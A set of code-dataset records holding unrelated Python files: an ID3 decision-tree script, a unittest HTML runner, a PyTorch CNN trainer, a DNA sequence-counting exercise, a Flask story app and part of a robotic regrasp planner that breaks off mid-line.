database.get_value_from_database(row,j) < criteria[j][1]:\n                    add_greater_row = False\n\n            if add_greater_row and database.get_value_from_database(row,column) >= value:\n                temp_databases[1].add_row(database.get_row(row))\n            elif add_lesser_row and database.get_value_from_database(row,column) < value:\n                temp_databases[0].add_row(database.get_row(row))\n\n    return temp_databases\n\n
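# NOTE (added commentary): each call yields two child databases -\n# temp_databases[0] receives the rows below the median of the chosen column and\n# temp_databases[1] the rest, i.e. a binary split resembling C4.5's treatment\n# of continuous attributes.\n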
''' --------get_answer--------\n    Gives the answer to the class of the database\n    Inputs: the dictionary containing the database classes\n    Output: the answer\n'''\ndef get_answer(dictionary):\n    for key,value in dictionary.items():\n        if value != None:\n            return str(key)\n\ndef get_value_to_sort(databases,column):\n    master_keys = []\n    for database in databases:\n        keys = database.get_values(column)\n        for key in keys:\n            master_keys.append(key)\n    master_keys.sort()\n    return master_keys[int(len(master_keys)/2)]\n\n\n''' --------id3_distributed--------\n    recursive function that splits the databases and does the heavy lifting\n    Inputs: the search criteria, the databases, the list to keep track of which columns have been spawned, the\n            main_entropy, and the search path\n    Output: None\n'''\ndef id3_distributed(criteria, databases, sorted_columns, main_entropy,path):#databases,columns,master_databases,total_records,sorted_columns):\n    #we want to check the last values given our search tree criteria\n    #more to come\n    classes = None\n\n    #temp_database = populate_database(databases,criteria)\n\n    #need to only get the result numbers and the classes\n    classes = ask_databases(databases,criteria)\n\n    totalResults = 0\n    temp = classes.items()\n    items_not_none = 0\n    for item in classes.items():\n        if item[1] != None:\n            totalResults += item[1]\n            items_not_none += 1\n\n    #temp_database.print_data()\n    if totalResults == 0:\n        print("There are no items in the database with the current search criteria ", criteria)\n        print("Path: %s" % path)\n        return\n\n    #classes = temp_database.get_sum_of_decisions(temp_database.get_num_of_columns() -1, criteria)\n    if classes == None:\n        print("ERROR THE CLASS IS NONE")\n    if items_not_none < 2:\n        print("Path: %s ANSWER: %s" % (path,get_answer(classes)))\n        return\n\n    #get the best attribute to split off of\n    best_column = select_next_best_attribute(databases, sorted_columns, main_entropy, criteria)\n    print("BEST_COLUMN: %i" % (best_column))\n\n    if best_column == -1:\n        #if there are no more splits to occur we return\n        print("can't determine an answer off of the current search criteria ", criteria)\n        print("Path: %s" % path)\n        return\n\n    temp_sorted_columns = copy.deepcopy(sorted_columns)\n    temp_sorted_columns[best_column] = 1\n\n    #we need to split the tree node and call again\n    #get the number of nodes that we need\n    num_of_nodes = get_num_of_nodes(databases,best_column,criteria)\n\n    temp_databases = []\n\n    for i in range(num_of_nodes):\n        temp_databases.append(Database('temp_d%i'%i))\n\n    #put the correct information in here\n    temp_databases = populate_temp_databases(databases,temp_databases,best_column,criteria)\n    for i in range(len(temp_databases)):\n        print('\\n--------------')\n\n        temp_path = copy.deepcopy(path)\n        temp_path += ("Column: %s Attribute: %i -> " % (get_letter(best_column),i+1))\n\n        temp_criteria = copy.deepcopy(criteria)\n        value = get_value_to_sort(databases,best_column)\n\n        if i == 0:\n            temp_criteria[best_column][0] = '<'\n            temp_criteria[best_column][1] = value\n        elif i == 1:\n            temp_criteria[best_column][0] = '>='\n            temp_criteria[best_column][1] = value\n\n        print("When Column %s = %s%f" % (get_letter(best_column),temp_criteria[best_column][0],temp_criteria[best_column][1]))\n\n        print("going to option %i on column %s" %(i+1,get_letter(best_column)))\n\n        id3_distributed(temp_criteria,databases,temp_sorted_columns,main_entropy,temp_path)\n\n''' --------select_next_best_attribute--------\n    gives the best attribute that you should sort off of given parameters\n    Inputs: the databases, list of columns that you can spawn off of, the main entropy, and the search criteria\n    Output: the column to spawn off of\n'''\ndef select_next_best_attribute(databases,selected_columns,main_entropy,criteria):\n\n    maxgain = [-1,-1]\n    #print("Selecting next best attribute")\n    #print("Selected Columns: ",selected_columns)\n\n    for i in range(databases[0].get_num_of_columns()-1):\n        #print("Column: %i" % i)\n        if selected_columns[i] == 1:\n            continue\n        entropy_dict = None\n        results = []\n\n        for database in databases:\n            temp_dict = database.get_column_information(i, criteria)\n            #print("  temp_dict ", temp_dict)\n            entropy_dict = update_dict(entropy_dict,temp_dict)\n            #print("  entropy_dict ", entropy_dict)\n            # total_records is the module-level row count set in __main__ below\n            ratio = float(database.get_num_of_rows()/total_records)\n            temp_entropy = calculate_entropy(entropy_dict)\n            #print(temp_entropy)\n            results.append(temp_entropy*ratio)\n        weighted_avg = 0\n        for items in results:\n            weighted_avg += items\n        if maxgain[1] < weighted_avg - main_entropy and weighted_avg > 0:\n            maxgain[0] = i\n            maxgain[1] = weighted_avg - main_entropy\n\n    return maxgain[0]\n\nif __name__ == "__main__":\n\n    #create the database objects\n    d1 = Database("s1","seed1.txt")\n    d2 = Database("s2","seed2.txt")\n    d3 = Database("s3","seed3.txt")\n\n    #show all of the information in the databases\n    d1.print_data()\n    d2.print_data()\n    d3.print_data()\n\n    #put the databases in a list\n    databases = [d1,d2,d3]\n\n    #create a list that keeps track of which columns have been selected to split off of\n    sorted_columns = []\n    criteria = []\n    for i in range(d1.get_num_of_columns()-1):\n        sorted_columns.append(-1)\n        criteria.append([-1,None])\n    print(d1.get_num_of_columns()-1)\n    #calculate entropy\n    entropy_dict = None\n    total_records = 0\n    for database in databases:\n        total_records += database.get_num_of_rows()\n        temp_dict = database.get_sum_of_decisions(database.get_num_of_columns()-1,criteria)\n        print("  temp_dict ", temp_dict)\n        entropy_dict = update_dict(entropy_dict,temp_dict)\n        print("  entropy_dict ", entropy_dict)\n    main_entropy = calculate_entropy(entropy_dict)\n    print("main entropy: %f" % main_entropy)\n\n\n\n    #split the databases to make a decision tree\n    id3_distributed(criteria,databases,sorted_columns, main_entropy, "")\n","sub_path":"database_revised.py","file_name":"database_revised.py","file_ext":"py","file_size_in_byte":20578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551717904","text":"import unittest\nfrom common import HTMLTestRunner_cn\n\n# Path to the test cases\ncasepath="E:\pythonlizi\web_auto\case"\nrule="test*.py"\ndiscover=unittest.defaultTestLoader.discover(start_dir=casepath,pattern=rule)\nprint(discover)\n\n
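# NOTE (added commentary): defaultTestLoader.discover() walks casepath\n# recursively, loading every test from files that match the pattern into one\n# TestSuite, which the HTML runner below then executes.\n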
import unittest\nfrom common import HTMLTestRunner_cn\n\n#path to the directory that holds the test cases\ncasepath=\"E:\pythonlizi\web_auto\case\"\nrule=\"test*.py\"\ndiscover=unittest.defaultTestLoader.discover(start_dir=casepath,pattern=rule)\nprint(discover)\n\n#path to the HTML report\nreportpath=r\"E:\pythonlizi\web_auto\report\\\\\" + \"report.html\"\n\nfp=open(reportpath,\"wb\")\n\nrunner=HTMLTestRunner_cn.HTMLTestRunner(stream=fp,title=\"Test Title\")\nrunner.run(discover)\n\nfp.close()","sub_path":"web_auto/run_all.py","file_name":"run_all.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"495051330","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.data as Data\nimport torchvision\nimport matplotlib.pyplot as plt\nimport torch.cuda.nccl as nccl\nimport numpy\nimport scipy.io as sio\nimport torch.optim as optim\n\ntorch.manual_seed(1)    # reproducible\n\n# Counter for the execution time\nstart = torch.cuda.Event(enable_timing=True)\nend = torch.cuda.Event(enable_timing=True)\nstart.record()\n\n\n# Hyper Parameters\nEPOCH = 1 # number of epochs\nBATCH_SIZE = 4 # used for training \n#BATCH_SIZE2 = 256 # used for test\nLR = 1e-4 # learning rate\nMM = 0.99 # momentum - used only with SGD optimizer\n\n# use 3 dropout values: one for the input image, one for convolution layers, one for final (linear) layers\nDROPOUT_INITIAL = 0\nDROPOUT_MIDDLE_1 = 0\nDROPOUT_MIDDLE_2 = 0\nDROPOUT_CLASSIFIER = 0\n\nRELU = True\n\nL_FIRST = 103\nL_SECOND = 103\nL_THIRD = 103\n#L_FOURTH = 32\nL_FIFTH = 2575 \nL_SIXTH = 81\nL_SEVENTH = 27\n\nTRAIN_VECTOR_SIZE = 200\nTRAIN_SIZE = 1800 # 3437\nTEST_SIZE = 40976\n\n# data is read from the file created in matlab\ndatabase = sio.loadmat('database200.mat')\n\n# data needed for the test is:\n# - changed to numpy type\n# - changed to torch type\n# - the grad is removed \n# - the form of matrix is changed for [number_of_elements, channels, height, width] \ntest_data = database['test_data']\ntest_data = numpy.array(test_data, dtype=numpy.float32)\ntest_data = torch.from_numpy(numpy.array(test_data))\ntest_data.requires_grad = False\ntest_data = test_data.permute(0,3,1,2)\n\ntest_target = database['test_target']\ntest_target = numpy.array(test_target, dtype=numpy.float32)\ntest_target = torch.from_numpy(numpy.array(test_target))\ntest_target.requires_grad = False\ntest_target = torch.t(test_target).type(torch.LongTensor).cuda()\n\ntrain_data = database['train_data']\ntrain_data = numpy.array(train_data, dtype=numpy.float32)\ntrain_data = torch.from_numpy(numpy.array(train_data))\ntrain_data.requires_grad = False\ntrain_data = train_data.permute(0,3,1,2)\n\ntrain_target = database['train_target']\ntrain_target = numpy.array(train_target, dtype=numpy.float32)\ntrain_target = torch.from_numpy(numpy.array(train_target))\ntrain_target.requires_grad = False\ntrain_target = torch.t(train_target).type(torch.LongTensor).cuda()\n\n\n# Data Loader for easy mini-batch return in training\ntrain_loader = Data.DataLoader(dataset = train_data, batch_size = BATCH_SIZE, shuffle = True, num_workers = 2 )\n#test_loader = Data.DataLoader(dataset = test_data, batch_size = BATCH_SIZE2, shuffle = False, num_workers = 2 )\n\n\nclass CNN(nn.Module):\n    def __init__(self):\n        super(CNN, self).__init__()\n        self.conv1 = nn.Sequential( \n            nn.Dropout(p = DROPOUT_INITIAL),\n            \n            nn.Conv2d(L_FIRST, L_SECOND, 5, 1, 2),\n            nn.Dropout(p = DROPOUT_MIDDLE_1),\n            nn.ReLU(RELU), \n            #nn.MaxPool2d(2), \n            nn.BatchNorm2d(L_SECOND),\n\n            
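# Conv2d arguments here are (in_channels, out_channels, kernel_size, stride, padding);\n            # a 5x5 kernel with stride 1 and padding 2 preserves the spatial size, so both\n            # branches keep identical shapes for the elementwise sums in forward().\n            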
nn.Conv2d(L_SECOND, L_THIRD, 5, 1, 2), \n nn.Dropout(p = DROPOUT_MIDDLE_1), \n nn.ReLU(RELU), \n #nn.MaxPool2d(2), \n nn.BatchNorm2d(L_THIRD), \n )\n \n self.conv2 = nn.Sequential( \n nn.Dropout(p = DROPOUT_INITIAL),\n \n nn.Conv2d(L_FIRST, L_SECOND, 3, 1, 1),\n nn.Dropout(p = DROPOUT_MIDDLE_2),\n nn.ReLU(RELU), \n #nn.MaxPool2d(2), \n nn.BatchNorm2d(L_SECOND),\n\n nn.Conv2d(L_SECOND, L_THIRD, 3, 1, 1), \n nn.Dropout(p = DROPOUT_MIDDLE_2), \n nn.ReLU(RELU), \n #nn.MaxPool2d(2), \n nn.BatchNorm2d(L_THIRD),\n ) \n \n self.classifier = nn.Sequential( \n \n #nn.AdaptiveMaxPool1d(L_FIFTH)\n nn.Dropout(DROPOUT_CLASSIFIER),\n nn.Linear(L_FIFTH,L_SIXTH),\n nn.ReLU(RELU), \n \n nn.Dropout(DROPOUT_CLASSIFIER),\n nn.Linear(L_SIXTH, L_SEVENTH),\n nn.ReLU(RELU),\n \n nn.Linear(L_SEVENTH, 10),\n )\n\n def forward(self, x): \n x1 = self.conv1(x) # branch 1\n x2 = self.conv2(x) # branch 2\n x3 = x1 + x2 # bring the branches together\n x4 = x3 + self.conv1(x)\n x5 = x3 + self.conv2(x)\n x = x4 + x5\n # a linear layer exppects a unidimensional vector of :\n # batch_size x channels x width x height\n x = x.view(x.size(0), -1) \n output = self.classifier(x)\n return output, x \n \n\ncnn = CNN()\n#print(cnn) # net architecture\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\nif torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n cnn = nn.DataParallel(cnn)\n\ncnn = torch.nn.DataParallel(cnn, device_ids=[0]).cuda()\ncnn.to(device)\ntrain_data, train_target = train_data.to(device), train_target.to(device) \ntest_data, test_target = test_data.to(device), test_target.to(device)\n\nloss_func = nn.CrossEntropyLoss()\n#loss_func = nn.NLLLoss()\n\noptimizer = torch.optim.Adam(cnn.parameters(), lr=LR)\n#optimizer = optim.SGD(cnn.parameters(), lr=LR, momentum=MM)\n\n# training \nfor epoch in range(EPOCH):\n loss = None\n for step, data in enumerate(train_loader,0):\n optimizer.zero_grad() # clear gradients for this training step \n output = cnn(train_data)[0] # cnn output\n loss = loss_func(output, train_target[0]) # calculate loss\n loss.backward() # backpropagation, compute gradients\n optimizer.step() # apply gradients\n\n if step % 50 == 0:\n test_output, last_layer = cnn(train_data)\n pred_y = torch.max(test_output, 1)[1]\n accuracy = torch.sum(pred_y == train_target[0]).type(torch.FloatTensor) / float(train_target.size(1))\n print('Epoch: ', epoch, ' | Error: %.3f' % loss.cpu().detach().numpy(),' | Training Accuracy: %.3f' % accuracy)\n\nlabel1 = torch.tensor([6431, 18449, 1899, 2864, 1145, 4829, 1130, 3482, 747]).type(torch.FloatTensor)\nlabel2 = torch.zeros(1,9)\n\nwith torch.no_grad():\n outputs = cnn(test_data)[0]\n _, predicted = torch.max(outputs, 1)\n predicted = predicted.to(device)\n\n c = (predicted == test_target[0]).squeeze()\n c = c.to(device)\n \nfor j in range (40976):\n if (c[j] == 1):\n label2[0,predicted[j]-1] += 1 \n \n \n#print('Correct classification in each class: ',label2)\npercent = (torch.sum(c).item()/TEST_SIZE)\nprint('Correct Classification (Percent): %.2f' % percent)\nprint('Results by classes: ',label2/label1)\n\nend.record()\n\n# Waits for everything to finish running\ntorch.cuda.synchronize()\n\nprint('Total execution time: ',start.elapsed_time(end))\n\ntorch.cuda.empty_cache()\n","sub_path":"all_code.py","file_name":"all_code.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"625161635","text":"# A. 
How many sequences are in that file?\n# B. How many have the pattern CTATA?\n# C. How many have more than 1000 bases?\n# D. How many have over 50% GC composition?\n# E. How many have more than 2000 bases and more than 50% GC composition?\n\n\nfilename = \"Chapter Specification/sequence.txt\"\n\n\n\ni = 0\nfor seq in open(filename):\n    seq = seq.rstrip()\n    i = i+1\n    print(i,\" \",seq)\n\nprint(\"A.\", i, \"sequences are in that file.\")\n\n\n\ni = 0\nfor seq in open(filename):\n    seq = seq.rstrip()\n    pos = seq.find(\"CTATA\")\n    if pos != -1:\n        i=i+1\n    \nprint(\"B.\", i, \"sequences have the pattern CTATA.\")\n\n\n\ni = 0\nfor seq in open(filename):\n    seq = seq.rstrip()\n    if len(seq) > 1000:\n        i=i+1\n    \nprint(\"C.\", i, \"sequences have more than 1000 bases.\")\n\n\n\ni = 0\nfor seq in open(filename):\n    seq = seq.rstrip()\n    num = seq.count(\"G\")+seq.count(\"C\")\n    count = len(seq)\n    num = num*1.0\n    count = count*1.0\n    if num/count*100.0 > 50:\n        i=i+1\n    \nprint(\"D.\", i, \"sequences have over 50% GC composition.\")\n\n\n\ni = 0\nfor seq in open(filename):\n    seq = seq.rstrip()\n    num = seq.count(\"G\")+seq.count(\"C\")\n    count = len(seq)\n    num = num*1.0\n    count = count*1.0\n    if num/count*100.0 > 50 and count > 2000:\n        i=i+1\n    \nprint(\"E.\", i, \"sequences have more than 2000 bases and over 50% GC composition.\")\n","sub_path":"3-2/CSE 3210 (Artificial Intelligence)/Lab Works by '15/Python All/13. If and Files - Exercise - 5.py","file_name":"13. If and Files - Exercise - 5.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"355047567","text":"from flask import Flask, request, render_template, redirect\nimport json\napp = Flask(__name__)\n\nurlCentreText = {\"0\" : \"Start your story\"}\n\n@app.route(\"/\")\ndef start():\n    return redirect(\"0\")\n\n@app.route(\"/<url>\", methods=[\"POST\", \"GET\"])\ndef story_page(url):\n    global urlCentreText\n    if request.method == \"POST\":\n        if \"newUrl\" in request.form:\n            urlCentreText[request.form[\"newUrl\"]] = request.form[\"cellInput\"]\n        elif \"save\" in request.form:\n            with open(\"savedStoryText.json\", \"w\") as outfile:\n                json.dump(urlCentreText, outfile)\n        elif \"load\" in request.form:\n            with open(\"savedStoryText.json\") as json_data:\n                urlCentreText = json.load(json_data)\n\n    return render_template(\"storyTemplate.html\",\n                           url=url,\n                           dictionary=urlCentreText)\n\n@app.route(\"/<url>/storysofar\")\ndef story_so_far(url):\n    urlList = []\n    for x in range(1, len(url)):\n        urlList.append(url[:x + 1])\n    return render_template(\"storySoFar.html\",\n                           urlList=urlList,\n                           dictionary=urlCentreText)\n\n\n\n","sub_path":"story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"169677348","text":"'''A class for regrasp planning. 
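It plans a sequence of pick-and-place actions for a single object, inserting temporary placements for regrasping whenever no one grasp is reachable at both the start and the goal pose. 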
Extends ideas in \"Regrasping\" by Tournassoud et al., 1987.'''\n\n# python\nfrom multiprocessing.connection import Client\n# scipy\nimport matplotlib\nfrom numpy.linalg import norm\nfrom scipy.spatial import cKDTree\nfrom numpy.random import randint, uniform\nfrom numpy import arccos, argmin, arange, array, ascontiguousarray, concatenate, cos, cross, \\\n dot, eye, exp, hstack, isnan, log, logical_and, logical_not, max, mean, minimum, nonzero, ones, \\\n pi, power, repeat, reshape, sum, tile, unique, vstack, where, zeros\n# openrave\nimport openravepy\n# self\nimport point_cloud\nimport c_extensions\nimport hand_descriptor\nfrom planner import Planner\nfrom hand_descriptor import HandDescriptor\n \nclass PlannerRegrasp(Planner):\n\n def __init__(self, env, temporaryPlacePosition, nGraspSamples, halfAngleOfGraspFrictionCone,\n nTempPlaceSamples, nGoalPlaceSamples, taskCostFactor, stepCost, segmUncertCostFactor,\n compUncertCostFactor, graspUncertCostFactor, placeUncertCostFactor, antipodalCostFactor,\n insignificantCost, maxSearchDepth, maxIterations, minPointsPerSegment, preGraspOffset):\n '''Initialize a regrasp planner.\n \n - Input env: EnvironmentPickPlace instance for visualization and collision checking.\n - Input temporaryPlacePosition: Obstacle-free position on the table where objects can safely\n be temporary placed for regrasping. 3-element numpy array.\n - Input nGraspSamples: Number of grasps to sample on each planning iteration.\n - Input halfAngleOfGraspFrictionCone: 0.5 * the solid angle (in radians) of the friction cone of\n between object surfaces and the gripper. Smaller values are more conservative, but will result\n in fewer grasp samples and thus longer planning times, longer plans, or fewer solutions.\n - Input nTempPlaceSamples: Number of temporary placements to sample on each planning iteration. \n - Input nGoalPlaceSamples: Number of goal placements to sample on each planning iteration.\n - Input taskCostFactor: Factor for the costs provied by the arrangement/task planner.\n - Input stepCost: The (scalar) plan cost for any grasp/place.\n - Input segmUncertCostFactor: Cost factor for uncertainty in object segmentation.\n - Input compUncertCostFactor: Cost factor for uncertainty in shape completion.\n - Input graspUncertCostFactor: Cost factor for grasping points with high completion uncertainty.\n - Input antipodalCostFactor: Cost factor penalizing large angles between the normal force and\n closing direction.\n - Input placeUncertCostFactor: Cost factor for placing on points with high completion uncertainty.\n - Input insignificantCost: A cost, if added to the final plan cost, is considered insignificant.\n This makes it possible to exit early if a plan cost exceeds a lower bound on the cost.\n - Input maxSearchDepth: Maximum plan length before restarting the search with additional grasp\n and place samples. This is an upper bound for plan length: if set too low, sometimes no\n solution will be found when solutions exist. Setting too low will also result in quickly\n sampling additional grasps / places. This value should (typically) be at least 4, i.e.,\n at least 1 temporary placement and regrasp.\n - Input maxIterations: Maximum number of sampling iterations for the regrasp planner. 
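Each iteration draws a fresh batch of grasp and placement samples and re-runs the graph search. 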
The\n regrasp planner may exit early if a lower bound on the cost is met.\n - Input minPointsPerSegment: Needed by Planner base class: a segment must have this many points\n to be considered an object.\n - Input preGraspOffset: Needed by Planner base class: pre-grasp is offset by this distance in\n negative approach direction.\n '''\n \n Planner.__init__(self, env, minPointsPerSegment, preGraspOffset)\n \n # input checking\n I = (int, long)\n if not isinstance(nGraspSamples, I) or not isinstance(nTempPlaceSamples, I) or \\\n not isinstance(nGoalPlaceSamples, I) or not isinstance(maxSearchDepth, I) or \\\n not isinstance(maxIterations, I):\n raise Exception(\"An integer parameter is not integer-valued.\")\n \n if nGraspSamples < 0:\n raise Exception(\"nGraspSamples be non-negative.\")\n \n if halfAngleOfGraspFrictionCone < 0 or halfAngleOfGraspFrictionCone > pi / 2.0:\n raise Exception(\"halfAngleOfGraspFrictionCone must be in [0, pi/2]\")\n \n if nTempPlaceSamples < 0 or nGoalPlaceSamples < 0:\n raise Exception(\"Place parameters must be non-negative.\") \n \n if taskCostFactor < 0 or stepCost < 0 or segmUncertCostFactor < 0 or compUncertCostFactor < 0 \\\n or graspUncertCostFactor < 0 or placeUncertCostFactor < 0 or antipodalCostFactor < 0 or \\\n insignificantCost < 0: raise Exception(\"Cost factors all assumed to be be non-negative.\")\n \n if maxSearchDepth < 0 or maxIterations < 0:\n raise Exception(\"Search parameters must be non-negative.\")\n \n # grasp parameters\n self.nGraspSamples = nGraspSamples\n self.halfAngleOfGraspFrictionCone = halfAngleOfGraspFrictionCone\n self.cosHalfAngleOfGraspFrictionCone = cos(halfAngleOfGraspFrictionCone)\n self.nominalDescriptor = HandDescriptor(eye(4)) # for hand dimensions\n self.handWidth = self.nominalDescriptor.width\n self.handDepth = self.nominalDescriptor.depth\n self.squareHandWidth = self.nominalDescriptor.width**2 # for quick grasp feasibility checking\n \n # place parameters\n self.nTempPlaceSamples = nTempPlaceSamples\n self.nGoalPlaceSamples = nGoalPlaceSamples\n self.temporaryPlacePosition = temporaryPlacePosition\n \n # cost factors\n self.taskCostFactor = taskCostFactor\n self.stepCost = stepCost\n self.segmUncertCostFactor = segmUncertCostFactor\n self.compUncertCostFactor = compUncertCostFactor\n self.graspCostFactor = graspUncertCostFactor\n self.placeCostFactor = placeUncertCostFactor\n self.antipodalCostFactor = antipodalCostFactor\n self.insignificantCost = insignificantCost\n \n # search parameters\n self.maxSearchDepth = maxSearchDepth \n self.maxIterations= maxIterations\n \n # internal variables (pre-sample grasps)\n self.preSampledClouds = []\n self.preSampledPairs = []\n self.preSampledBinormals = []\n self.preSampledGrasps = []\n \n # internal variables (continue planning)\n self.contTargObjs = []\n self.contUniqueTargObjs = []\n \n def Continue(self):\n '''TODO'''\n \n # load data saved from Plan\n targObjs = self.contTargObjs\n uniqueTargObjs = self.contUniqueTargObjs \n \n # continue each worker\n connections = []\n for i in xrange(len(uniqueTargObjs)):\n \n # send continue message to each worker\n message = [\"regrasp-continue\"]\n try:\n print(\"Continuing regrasp planning worker {}.\".format(i))\n connection = Client(('localhost', 7000 + i))\n except:\n for connection in connections: connection.close()\n raise Exception(\"Unable to connect to worker {}.\".format(i))\n connection.send(message)\n connections.append(connection)\n \n # wait for result\n pickPlaces = []; goalIdxs = []; costs = []; workerIdxs = []\n 
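# Poll the worker connections round-robin: each finished worker reports its\n    # (pickPlaces, goalIdx, cost) triple, and once any solution is in hand the\n    # best cost so far is forwarded so the remaining workers can cancel early.\n    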
done = zeros(len(connections), dtype = 'bool')\n i = -1\n \n while not done.all():\n \n # check the next connection\n i = 0 if i + 1 == len(connections) else i + 1 \n \n # ignore connections that are done\n if done[i]: continue\n \n # if there is a result waiting, receive it\n if connections[i].poll(0.1): \n message = connections[i].recv()\n connections[i].close()\n purpose = message[0]\n data = message[1:]\n if purpose == \"regrasp-continue\":\n pickPlaces.append(data[0])\n goalIdxs.append(data[1])\n costs.append(data[2])\n workerIdxs.append(i)\n done[i] = True\n print(\"Worker {} completed with cost {}.\".format(i, costs[-1]))\n else:\n print(\"Warning: message had purpose {}\".format(message[0]))\n continue\n \n # send cancel if there is a solution\n if len(costs) > 0:\n try: connections[i].send([\"regrasp-continue-cancel\", min(costs)])\n except: print(\"Warning: failed to send cancel to worker {}.\".format(i))\n \n # return best result\n bestIdx = argmin(costs)\n print(\"Worker {} had best cost {} with object {}.\".format( \\\n workerIdxs[bestIdx], costs[bestIdx], uniqueTargObjs[workerIdxs[bestIdx]]))\n \n targObjIdx = uniqueTargObjs[workerIdxs[bestIdx]]\n goalIdx = where(targObjIdx == targObjs)[0][goalIdxs[bestIdx]]\n\n return pickPlaces[bestIdx], goalIdx, targObjIdx\n \n def ContinueWorker(self, connection):\n '''TODO'''\n \n # Load data saved from previous call to PlanWorker.\n \n cloud = self.contCloud\n normals = self.contNormals\n graspContacts = self.contGraspContacts\n graspBinormals = self.contGraspBinormals\n pointCosts = self.contPointCosts\n triangleNormals = self.contTriangleNormals\n supportingTriangles = self.contSupportingTriangles\n cloudCenter = self.contCloudCenter\n originalGoalPlaces = self.contOriginalGoalPlaces\n goalPlaces = self.contGoalPlaces\n goalCosts = self.contGoalCosts\n graspPlaceTable = self.contGraspPlaceTable\n grasps = self.contGrasps\n graspCosts = self.contGraspCosts\n tempPlaces = self.contTempPlaces\n placeCosts = self.contPlaceCosts\n obstacleCloudAtStart = self.contObstacleCloudAtStart\n obstacleCloudAtGoal = self.contObstacleCloudAtGoal\n \n # Search for plans.\n \n plan = []; cost = float('inf')\n \n nReachableStart = sum(graspPlaceTable[:, 0] > 0) if graspPlaceTable.shape[1] > 0 else 0\n nReachableGoal = sum(graspPlaceTable[:, 1 + len(tempPlaces):] > 0) \\\n if graspPlaceTable.shape[1] > 0 else 0\n \n for iteration in xrange(self.maxIterations):\n \n if len(plan) > 0: break # stop as soon as a plan is found\n \n if connection.poll():\n message = connection.recv()\n if message[0] == \"regrasp-continue-cancel\":\n print(\"Received cancel.\")\n self.SaveContinuationData(plan, cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces,\n goalCosts, graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n return [], None, float('inf')\n \n graspsNew, pairsNew = self.SampleGrasps(cloud, normals, graspContacts, graspBinormals)\n graspCostsNew = self.GetGraspCosts(cloud, normals, pointCosts, pairsNew)\n \n if nReachableStart > 0 and nReachableGoal > 0:\n tempPlacesNew, tempPlacesNewTriangles = self.SamplePlaces(cloud, supportingTriangles,\n triangleNormals, cloudCenter)\n tempPlaceCostsNew = self.GetPlaceCosts(pointCosts, tempPlacesNewTriangles)\n else:\n tempPlacesNew = []\n tempPlaceCostsNew = zeros(0)\n \n goalPlacesNew = originalGoalPlaces[len(goalPlaces) : len(goalPlaces) + \\\n self.nGoalPlaceSamples] if 
nReachableStart > 0 else []\n goalPlaceCostsNew = goalCosts[len(goalPlaces) : len(goalPlaces) + self.nGoalPlaceSamples] \\\n if nReachableStart > 0 else zeros(0)\n \n graspPlaceTable, placeTypes, grasps, graspCosts, tempPlaces, goalPlaces, placeCosts, \\\n nReachableStart, nReachableTemp, nReachableGoal = self.UpdateGraspPlaceTable(\n graspPlaceTable, grasps, graspsNew, graspCosts, graspCostsNew, tempPlaces, tempPlacesNew,\n goalPlaces, goalPlacesNew, placeCosts, tempPlaceCostsNew, goalPlaceCostsNew,\n obstacleCloudAtStart, obstacleCloudAtGoal)\n if nReachableStart == 0 or nReachableGoal == 0: continue\n \n plan, cost = self.SearchGraspPlaceGraph(graspPlaceTable, placeTypes, graspCosts, placeCosts)\n print(\"Iteration: {}. Regrasp plan: {}. Cost: {}.\".format(iteration, plan, cost))\n \n # Return result\n self.SaveContinuationData(plan, cloud, normals, graspContacts, graspBinormals, pointCosts,\n triangleNormals, supportingTriangles, cloudCenter, originalGoalPlaces, goalPlaces, goalCosts,\n graspPlaceTable, grasps, graspCosts, tempPlaces, placeCosts, obstacleCloudAtStart,\n obstacleCloudAtGoal)\n pickPlaces, goalIdx = self.PlanToTrajectory(plan, grasps, tempPlaces, goalPlaces)\n return pickPlaces, goalIdx, cost\n \n def GetAntipodalPairsOfPoints(self, cloud, normals):\n '''Given a point cloud of an object with corresponding surface normals, computes \"antipodal\"\n pairs of points. See spatial antipodal grasps in \"A Mathematical Introduction to Robotic\n Manipulation\" by Murray, Li, and Sastry. This is a preprocessing step for sampling hand poses\n for antipodal grasps.\n \n - Input cloud: nx3 numpy array of points.\n - Input normals: nx3 numpy array of surface normals (assumes norm(normals, axis = 1) = 1).\n - Returns pairs: List of pairs of indices into cloud, indicating pairs of points which can form\n antipodal grasps, assuming the gripper is not in collision and makes contact with these points.\n - Returns binormals: List of unit vectors in direction of line connecting the corresponding\n point pairs. 
These are candidate hand closing directions.\n '''\n \n # Input checking \n \n if cloud.shape[0] != normals.shape[0]:\n raise Exception(\"Cloud with {} points does not match {} normals.\".format(\n cloud.shape[0], normals.shape[0]))\n \n if cloud.shape[1] != 3 or normals.shape[1] != 3:\n raise Exception(\"Cloud or normals not 3D.\")\n \n # Identify antipodal pairs of points.\n # A point pair is antipodal if the line drawn between them lies within both friction cones, i.e.\n # is within some threshold angle of the object's surface normal.\n \n # (Consider all pairs of points, in both directions.)\n i = reshape(tile(arange(cloud.shape[0]), cloud.shape[0]), (cloud.shape[0]**2, 1))\n j = reshape(repeat(arange(cloud.shape[0]), cloud.shape[0]), (cloud.shape[0]**2, 1))\n pairs = hstack((i, j)) \n \n # (Vectorize calculation of binormals for each pair of points in the cloud.)\n X = tile(cloud, (cloud.shape[0], 1))\n Y = repeat(cloud, cloud.shape[0], axis = 0)\n binormals = X - Y\n # remove pairs not containing distinct points ---\n binormalsLen = norm(binormals, axis = 1)\n uniquePointsInPair = binormalsLen > 0\n binormals = binormals[uniquePointsInPair]\n binormalsLen = binormalsLen[uniquePointsInPair]\n pairs = 